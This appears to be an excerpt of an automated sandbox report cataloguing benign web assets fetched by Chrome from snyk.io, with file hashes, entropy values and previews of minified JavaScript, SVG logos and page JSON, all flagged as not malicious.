                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[20],{"11Hm":function(e,t,n){"use strict";function _extends(){return(_extends=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}var o=n("QS52"),r=(n("c58o"),n("h7FZ"));function addLeadingSlash(e){return"/"===e.charAt(0)?e:"/"+e}function stripBasename(e,t){return function hasBasename(e,t){return new RegExp("^"+t+"(\\/|\\?|#|$)","i").test(e)}(e,t)?e.substr(t.length):e}function stripTrailingSlash(e){return"/"===e.charAt(e.length-1)?e.slice(0,-1):e}function createPath(e){var t=e.pathname,n=e.search,o=e.hash,r=t||"/";return n&&"?"!==n&&(r+="?"===n.charAt(0)?n:"?"+n),o&&"#"!==o&&(r+="#"===o.charAt(0)?o:"#"+o),r}function createLocation(e,t,n,r){var i;"string"===typeof e?(i=function parsePath(e){var t=e||"/",n="",o="",r=t.indexOf("#");-1!==r&&(o=t.substr(r),t=t.substr(0,r));var i=t.indexOf("?");return-1!==i&&(
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):5550
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.08413407543783
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:T/FaJP0dFUt4Fe+e0HFmP29tX9YdGOkjnNCVDFL+3nrIE5K0xUaSS:DFrut4EaYO9tW2OunrZM0uC
                                                                                                                                                                                                                                                                                                              MD5:8242F9F169F5CCBADF3768078BD83E35
                                                                                                                                                                                                                                                                                                              SHA1:47172C3F38E9618C7BF7D5AC180E8FF97816B46B
                                                                                                                                                                                                                                                                                                              SHA-256:F9AAB069A4C2E5B6F9FBB3BE741E4476BFC5052474468C6A38A6AF2469399603
                                                                                                                                                                                                                                                                                                              SHA-512:4AD20651AB371F1AF36AFF3FEE1FC7CF50FCFBDF5704DD7492EBF4A1337FAE4BDF8AA162143B7ADD768968FAE446A40C4A232FD48FAA9FB991CAC98C2C4B37F3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1713192738/website-customer-logos/logo-kroger.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="84" height="48" viewBox="0 0 84 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_13037_2533)">.<path d="M22.9551 20.1788V18.0073H19.0107V31.3228H23.0518V23.9436C23.7443 22.4018 24.9126 21.6307 26.5569 21.6303C27.0366 21.628 27.5152 21.6755 27.9851 21.7721V17.9483C27.6384 17.8225 27.2173 17.7595 26.7218 17.7595C25.3514 17.7595 24.0958 18.566 22.9551 20.1788Z" fill="#134B97"/>.<path d="M40.9101 29.5653C42.2125 28.2403 42.8637 26.6018 42.8637 24.6498C42.8637 22.7141 42.2125 21.0813 40.9101 19.7515C39.6077 18.4217 37.9906 17.7568 36.0588 17.7568C34.1271 17.7568 32.5122 18.4248 31.2142 19.7608C29.9163 21.0968 29.267 22.7264 29.2666 24.6498C29.2666 26.5731 29.9158 28.2046 31.2142 29.5441C32.5127 30.8836 34.1275 31.5535 36.0588 31.554C37.9906 31.5557 39.6077 30.8928 40.9101 29.5653ZM33.9231 26.9498C33.3684 26.3254 33.091 25.5596 33.091 24.6524C33.091 23.7607 33.3684 23.0009 33.9231 22.3729C34.4778 21.7449 35.1899 21.4306 36.0595 21.4302C36.9287 21.4302
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9671), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):9671
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.311369519927307
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:ThtXcnC4AlvGQkvbq7wy3NEp/HSIoC7JSzvHWsbgwR3NJ6:ThtXcyRovbq7wXp/yIdJkHrgqP6
                                                                                                                                                                                                                                                                                                              MD5:7342546A5D5F4F44C1F41779B7D84698
                                                                                                                                                                                                                                                                                                              SHA1:98284045050F411A3DFB1E0CADB576EC5A45B314
                                                                                                                                                                                                                                                                                                              SHA-256:6EB02D1AD74B33784271ED5F4E820C7B046031E3852A9C5984E145FB778D8FF3
                                                                                                                                                                                                                                                                                                              SHA-512:00D229C72A129A7758D59618DD654BB96F1FC27145AE8B556001A123CAB89471941C0452AAF5E9571BAEF7568B68B23D82152F21380AEEBDF21DCB9C29E80FAF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9875],{73359:function(l,i,e){e.d(i,{Z:function(){return r}});var o=e(85893),n=e(45697),d=e.n(n),a=e(44133);function t(l){let{label:i,className:e}=l;return(0,o.jsx)("span",{className:(0,a.Z)("badge",e),"data-component":"Badge",children:i})}t.propTypes={label:d().string,type:d().string,className:d().string};var r=t},1789:function(l,i,e){e.d(i,{Z:function(){return u}});var o=e(85893),n=e(45697),d=e.n(n),a=e(73359),t=e(24982),r=e(44133),s=e(15020);function v(l){let{badge:i,isAnimated:e,message:n,url:d}=l;return(0,o.jsxs)("div",{className:(0,r.Z)("announcement-bar group",e&&"animated fly-in-bottom"),"data-component":"Announcement Bar",children:[(null==i?void 0:i.label)&&(0,o.jsx)(a.Z,{label:null==i?void 0:i.label}),(0,o.jsx)(t.Z,{href:d,className:(0,r.Z)("announcement-link link-arrow link-stretched"),children:n})]})}v.propTypes={badge:d().exact({...a.Z.propTypes}),colorScheme:d().oneOf(s.z7),isAnimated:d().bool,message:d(
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (11309), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):11309
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.363373594899577
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:gmRSysLY3bJ+hSjb0m0qz065dnIDRwd+SUOyVayD2:XsLY3bJ+cvnVd+vO4I
                                                                                                                                                                                                                                                                                                              MD5:9226380572C7D17A92E9224C394FB751
                                                                                                                                                                                                                                                                                                              SHA1:8AA2812F19BD0BF7EAF233BE424F0B2F43839EA5
                                                                                                                                                                                                                                                                                                              SHA-256:95EE4ED7E8C060DC445FE94EC1C74371E0D5553D62380D13B24759E66A5FD863
                                                                                                                                                                                                                                                                                                              SHA-512:6258AF60A2371842E26C633BAFF0495A4D96E1C7F3C09DDA989AC5B8EBC625898C9DE594D0239BF896EC4612EF2B6912D346E959FEDE2E143315758815810E54
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/3259-a3f17db6e69abe5a.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3259],{61375:function(e,l,a){a.d(l,{Q:function(){return o}});let o=e=>{let l=e.trim().split(" ");return l.reduce((e,a,o)=>((0===o||o===l.length-1)&&(e="".concat(e).concat(a.charAt(0).toUpperCase())),e),"")}},40768:function(e,l){l.Z=["article","blog","byline","case-study","cheat-sheet","event","live-stream","podcast","press-release","reports-papers","video"]},32026:function(e,l,a){a.d(l,{Z:function(){return u}});var o=a(85893),i=a(45697),t=a.n(i),n=a(7756),r=a(44133),s=a(61375);let c={"extra-small":18,small:24,medium:32,large:84,huge:140};function d(e){var l,a;let{name:i,size:t="small",as:d="div",shape:u="circular",src:m,hasShadow:p,style:v,className:h,...g}=e;return(0,o.jsx)(d,{className:(0,r.Z)("avatar min-w-medium",t&&"avatar-".concat(t),!m&&"no-image","rounded"===u&&"radius-large","circular"===u&&"radius-full",p&&"shadow-mid",h),style:v,"data-name":i&&(0,s.Q)(i),"data-component":"Avatar",children:m&&(0,o.jsx)(n.Z,
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3587
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.413361854287383
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:tTPKtZFFdsI9SLNWv5A7DpbTSUxP46pYLNawCtt2vbYEHHWe8/S1:47vGNlpSwPjYLN9Z863
                                                                                                                                                                                                                                                                                                              MD5:582B35A024C0902327703A8FF75D2D5F
                                                                                                                                                                                                                                                                                                              SHA1:78722B75AED1CCADC6B14EB3200E9ADABFD2FC0D
                                                                                                                                                                                                                                                                                                              SHA-256:D84679011B54AEC124A7830DDA77C13C7A92DD6DF963DFD65810F23BF7E79D22
                                                                                                                                                                                                                                                                                                              SHA-512:D7C33CC40BB1A30D105B5527165FA6B932D8AD3C977253F460C75DF353C733A05C4B270D7FD5EBDE8C9B42C77995CFC8E5597FE23832967EA0D17BE6E35091CD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-mktg-brandui/brand-icons/security-automation.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="4" x2="60.496" y1="4" y2="52.6512"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#0a26b8"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="28.3332" x2="66.166" y1="22" y2="52.3044"><stop offset="0" stop-color="#4bd6b5"/><stop offset="1" stop-color="#145deb"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m51.9364 21.2666-6.6299-2.0912-.0034-.0011c-.7398-.2324-1.5332-.2324-2.2731 0l-15.0378 4.7434-.0045.0014c-.7964.2503-1.4885.7566-1.9682 1.4411-.4626.66-.7024 1.4498-.6855 2.2544v9.4456c0 6.4154 1.3109 11.885 4.2948 16.297 1.6803 2.4843 3.8244 4.535 6.3953 6.2017-.3513.4411-.6127.4411-.9609.4411h-5.8632c-.9128 0-1.2208 0-4.2392-7.6216l-2.3296-.9688c-6.3504 2.94-7.1008 2.94-7.3528 2.94h-.4872l-.4144-.364-4.172-4.1664c-.6328-.644-.8512-.868 2.4136-8
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (44881), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):44888
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.131331630700203
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:3X2JIdictPUCZNEMVvpxl+fm9re9PE8waMe:n2JIUct8AXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:AA9F9597D58C702E1B5BEA76D9A32991
                                                                                                                                                                                                                                                                                                              SHA1:1B45C690D31D6AD11EB5EE942B5C4F58D86BED35
                                                                                                                                                                                                                                                                                                              SHA-256:DDC7C712A21D80ECC76AA28C16E4ACBD931D3C5C40525679FE822E23E25CF900
                                                                                                                                                                                                                                                                                                              SHA-512:78B6C978F9C0BAB63D13F643C62A7F4250BA376A98DCEEE4DCDFFABC5234BBD3CFF09ED02083AFFEFDD30577116B055972240CE376B05783203BDFF9593CEA5E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2zERgk1K0w1458K67zl8Zz","type":"Entry","createdAt":"2024-02-08T13:46:10.315Z","updatedAt":"2024-04-17T17:44:30.955Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":16,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Snyk Customer Resources | Snyk","title":"Snyk Customer Resources | Snyk","slug":"snyk-customer-resources-or-snyk","uri":"customer-resources","pageLocalization":["fr","ja","pt-BR","de"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6qGET11QmeosuZ8IUymV9d","type":"Entry","createdAt":"2024-02-08T13:46:10.456Z","updatedAt":"2024-04-17T17:44:31.366Z","environment":{"sys":{"id":"master","type":"Link","link
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65522), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):71072
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.152262989280455
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:qa6nz6Yz6As0GcmOaTxJIbf+OhvQNXr9faMe:qa6nz6Yz6B0GcoTxshB
                                                                                                                                                                                                                                                                                                              MD5:ED82AC095051466B9D03B216F181342D
                                                                                                                                                                                                                                                                                                              SHA1:7DB1CB1F15B2B8876313BF16E4372C6144658A53
                                                                                                                                                                                                                                                                                                              SHA-256:FFC3A6ABF410B68F46AF8391A2EDE58690484EECE5BBC81EB90EE4F178C55346
                                                                                                                                                                                                                                                                                                              SHA-512:85D5212BD2190D78A42D6ABE571391C54984DBE62D703BA9A8138F47B3267BC19622AEC8A363185C8B7C0A5DC8A48EFF1B75ED61AFFF77772C6C7ABD6CCCF7DC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US.json
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2pesnRUd4EuQtDoD1WgKHR","type":"Entry","createdAt":"2022-07-19T18:59:08.588Z","updatedAt":"2024-06-24T19:36:16.485Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":196,"revision":63,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Homepage","title":"Developer security","slug":"/","uri":"/","pageLocalization":["fr","ja","de","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7d2Of140vuyBtYvbvTvJz2","type":"Entry","createdAt":"2022-09-13T18:07:49.153Z","updatedAt":"2024-10-02T15:57:53.136Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":114,"revision":36,"contentType":{"sys"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (33094), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):33094
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.271194779008479
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:+MT7wsVvhAfNL2hzOtDENEhe2xZc9KhvpcFvRrfVBejwX:+M/wsVvhAfNL2CEQbc9KVpcFvFVB6y
                                                                                                                                                                                                                                                                                                              MD5:D8739A9FE9A3A42936F5CD86C8727494
                                                                                                                                                                                                                                                                                                              SHA1:4FB60EC9F1C4EFF985C219BF24E4B1F340D62C97
                                                                                                                                                                                                                                                                                                              SHA-256:8F0F8792237470EE661C6AFC32CA68200DD74BCC0D544D0FD54C7777AF362EAE
                                                                                                                                                                                                                                                                                                              SHA-512:3326F37AE1DB03E06E8A1EC7E0B39D4F055C55E0B2DE6386F0677250A48B0146A081B3E17B42E01C194F0CD3FA5B63871FAE86478891644EA41BA1747A647EE5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/22.6b9a301a.chunk.js
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[22],{"+OSO":function(t,n,e){"use strict";e.d(n,"a",function(){return createClientReportEnvelope});var r=e("8dVd"),i=e("xqFT");function createClientReportEnvelope(t,n,e){var o=[{type:"client_report"},{timestamp:e||Object(i.a)(),discarded_events:t}];return Object(r.c)(n?{dsn:n}:{},[o])}},"/brt":function(t,n,e){"use strict";e.d(n,"a",function(){return severityLevelFromString});var r=["fatal","error","warning","log","info","debug"];function severityLevelFromString(t){return"warn"===t?"warning":r.includes(t)?t:"log"}},"26VM":function(t,n,e){"use strict";e.d(n,"a",function(){return isDOMError}),e.d(n,"b",function(){return isDOMException}),e.d(n,"c",function(){return isElement}),e.d(n,"d",function(){return isError}),e.d(n,"e",function(){return isErrorEvent}),e.d(n,"f",function(){return isEvent}),e.d(n,"g",function(){return isInstanceOf}),e.d(n,"h",function(){return isNaN}),e.d(n,"i",function(){return isPlainObject}),e.d(n,"j",function(){ret
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5969897580127865
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:2LGaUImyCp0GlYM1wBJPyQK5DrIt6xfeGYqX3ofWLGJw47Jsr4z+LAltEJJsVsVo:2ffmyCkMwykgIaoO4nsrqHdyyv
                                                                                                                                                                                                                                                                                                              MD5:9C2160161305054AF467EA797A7C408F
                                                                                                                                                                                                                                                                                                              SHA1:8B427BC141874CC164E2BE3DB02079FCC99AF9ED
                                                                                                                                                                                                                                                                                                              SHA-256:7F47F02C93D5DE5DE03DB0EBFFA39FE1060767437B086996E295C9818A05B2F2
                                                                                                                                                                                                                                                                                                              SHA-512:FCCC6474CC18139B34DC40F6009C358753658E34CC2DF5B7D2C4E253BFE9647957A2FD23F30C86EC2087C2B250BCB0C570BB9EEF54B10DF6C4A3A6659F56F228
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', true, false, false, false, false);..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (24671), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):24677
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3138344246237885
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:L1ljb7tk3jKT93fVxiaCaNk/sOXQDy1WV8XNn72j8I9Ly2bqxKHNOhe5:L1ZJsrG9MQj5
                                                                                                                                                                                                                                                                                                              MD5:3ED1ACB02510BD2361181841D4E25001
                                                                                                                                                                                                                                                                                                              SHA1:7229555C8E007AE429B12D93C47557CEB230FD86
                                                                                                                                                                                                                                                                                                              SHA-256:53A199EA5F704C5E5634830014A5FD6AC4B29178CD79604F84CC4C2340FC4CCF
                                                                                                                                                                                                                                                                                                              SHA-512:CC5F1CBA3B677A91C06F790460AF4B26AC0B3FAB13AAA3414C616652317E5B150481D6AE7A30D531CD5BAF649D536E9A09BE76BF3401FBFBB9D87D2843DFF4E9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/2248-53c2c321360bf056.js
                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2248],{37507:function(l,o,e){var i={"./asset-hyperlink.json":25994,"./blockquote.json":62559,"./document.json":51734,"./embedded-asset-block.json":1220,"./embedded-entry-block.json":72258,"./embedded-entry-inline.json":92204,"./embedded-resource-block.json":20546,"./embedded-resource-inline.json":8242,"./entry-hyperlink.json":6502,"./heading-1.json":92813,"./heading-2.json":45080,"./heading-3.json":86423,"./heading-4.json":34942,"./heading-5.json":95579,"./heading-6.json":50705,"./hr.json":37121,"./hyperlink.json":13165,"./list-item.json":38094,"./ordered-list.json":28122,"./paragraph.json":38986,"./resource-hyperlink.json":3105,"./table-cell.json":79924,"./table-header-cell.json":91787,"./table-row.json":75531,"./table.json":39269,"./text.json":63022,"./unordered-list.json":58500};function n(l){return e(a(l))}function a(l){if(!e.o(i,l)){var o=Error("Cannot find module '"+l+"'");throw o.code="MODULE_NOT_FOUND",o}return i[l]}n.key
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8592)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8928
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4178856450636195
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:A3KYWQCz/wFgswR+RD2vbtFSYsXTQKIF2b9XPSZ9sGLEyLA:A3KYZCzkT7RDyfSYs09U9/Sn8yLA
                                                                                                                                                                                                                                                                                                              MD5:1FA7B981E586665B5650AAC09848C9E4
                                                                                                                                                                                                                                                                                                              SHA1:E7B934CD7813B8E92B761F62246059157139872D
                                                                                                                                                                                                                                                                                                              SHA-256:D13B5DFDE16114A364BABCF3267A02B03569094DAE96A977C4F99267B44D2FF3
                                                                                                                                                                                                                                                                                                              SHA-512:D452914CBD7D2D4B3BD23557061F9AD67C71CCECD7392F83BCA35006E1E672F752688B60DD86A1110FF87D7FDCE46B9A817A2D6ACEA2D2A6061C8FC67D2C6324
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";var e,a,d,c,f,t,b,n,r,o,i={},u={};function s(e){var a=u[e];if(void 0!==a)return a.exports;var d=u[e]={exports:{}},c=!0;try{i[e].call(d.exports,d,d.exports,s),c=!1}finally{c&&delete u[e]}return d.exports}s.m=i,e=[],s.O=function(a,d,c,f){if(d){f=f||0;for(var t=e.length;t>0&&e[t-1][2]>f;t--)e[t]=e[t-1];e[t]=[d,c,f];return}for(var b=1/0,t=0;t<e.length;t++){for(var d=e[t][0],c=e[t][1],f=e[t][2],n=!0,r=0;r<d.length;r++)b>=f&&Object.keys(s.O).every(function(e){return s.O[e](d[r])})?d.splice(r--,1):(n=!1,f<b&&(b=f));if(n){e.splice(t--,1);var o=c();void 0!==o&&(a=o)}}return a},s.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return s.d(a,{a:a}),a},s.d=function(e,a){for(var d in a)s.o(a,d)&&!s.o(e,d)&&Object.defineProperty(e,d,{enumerable:!0,get:a[d]})},s.f={},s.e=function(e){return Promise.all(Object.keys(s.f).reduce(function(a,d){return s.f[d](e,a),a},[]))},s.u=function(e){return 3263===e?"static/chunks/3263-9512e0fe9b5c3a18.js":3
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1835
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.793123247511683
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHpdS3SKtHkseWPQQNnQ1LSGlIgBehPDvkL7x6Y0iHSmMXuNn4:tTNKtEG4OnMeczBehPDvkL7kY0iHS2N4
                                                                                                                                                                                                                                                                                                              MD5:8DACA7E065438A8D85CE019C780F03B2
                                                                                                                                                                                                                                                                                                              SHA1:BC8AA7CF2ED629517E29AAB6967968391E837F54
                                                                                                                                                                                                                                                                                                              SHA-256:EB8A6C0081E8B9E09B8896346277408227046A2F2A603395B2917B29ED4850BC
                                                                                                                                                                                                                                                                                                              SHA-512:4FEB67502CA2665A6C189F8F6A230BC318993446AB8EF0E43CE5DB54165F9EB302A2900449877D6E7F8B3BC7653BC81CAB01C26539AB56C85D37B20997638BCA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-mktg-brandui/product-logos/apprisk.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="4" x2="59.8364" y1="4" y2="49.0471"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#0a26b8"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="22" x2="66.7059" y1="22" y2="33.1765"><stop offset="0" stop-color="#ff78e1"/><stop offset="1" stop-color="#d54570"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m27.124 59.9867c.1247.0177.2513.0177.376 0 .1247.0177.2513.0177.376 0 .435-.1455.8636-.2952 1.2858-.449-6.1072-3.913-10.1618-10.7595-10.1618-18.5377 0-12.1335 9.8665-22 22-22 3.5984 0 6.9974.8678 9.9988 2.4051v-9.1945c.0118-.2571-.0624-.5108-.2112-.7216-.1488-.2107-.3637-.3668-.6113-.4437l-22.3238-6.99163c-.2295-.07156-.4755-.07156-.705 0l-22.32381 6.99163c-.24758.0769-.46252.233-.6113.4437-.14878.2108-.22302.4645-.21116.7216v13.9832c0 17.7937 7.343
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1032 x 1363, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):205530
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.980865135464369
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:GC7A5jCoV02LGrLtOQJy4NRjcgS+7DNvnl:d7c30YVQA4HjcKXNvnl
                                                                                                                                                                                                                                                                                                              MD5:EE2E7FA3418C66D547E504BD27716092
                                                                                                                                                                                                                                                                                                              SHA1:071B55D8895D58B0ADB8808E21BAC3A04403E80C
                                                                                                                                                                                                                                                                                                              SHA-256:2BDC1D84E325FB5A37E3CE20DD09F4A9BD20A15BF0AF63ADCF4C4C38CAC7053D
                                                                                                                                                                                                                                                                                                              SHA-512:0E82757CB3458F8085922247689CA90656E2206BADD5366A981F9FE22EC28E378A0F25D186A626941CD34A807D1725BDEF098EF566FDED10A15CB4CACF9873F6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://pic.trendemon.com/tasks_logo/2025/739b36d47655d6271db0356af0e12261.png
